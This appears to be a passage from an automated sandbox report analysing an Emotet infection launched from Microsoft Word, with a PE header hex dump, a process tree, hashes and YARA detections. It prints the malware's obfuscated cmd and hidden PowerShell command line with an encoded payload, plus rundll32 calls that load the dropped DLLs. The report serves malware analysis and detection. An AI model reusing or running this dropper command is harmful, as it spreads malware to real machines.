                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 
06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*0p>@@p"nCODE.0 `DATA@4@BSS`J.idata"p$J@.relocn


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    System Behavior

                                                    General

                                                    Start time:09:30:35
                                                    Start date:27/01/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13f340000
                                                    File size:1424032 bytes
                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:30:37
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAM
Imagebase:0x49ef0000
File size:345088 bytes
MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:09:30:37
Start date:27/01/2021
Path:C:\Windows\System32\msg.exe
Wow64 process (32bit):false
Commandline:msg user /v Word experienced an error trying to open the file.
Imagebase:0xff080000
File size:26112 bytes
MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:09:30:38
Start date:27/01/2021
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -w hidden -enc [base64-encoded command omitted]
Imagebase:0x13f3a0000
File size:473600 bytes
MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:09:30:45
Start date:27/01/2021
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Imagebase:0xff4a0000
File size:45568 bytes
MD5 hash:DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:09:30:45
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:46
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:47
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:48
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:49
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:50
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:52
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:09:30:52
Start date:27/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
Imagebase:0xbc0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

Disassembly

Code Analysis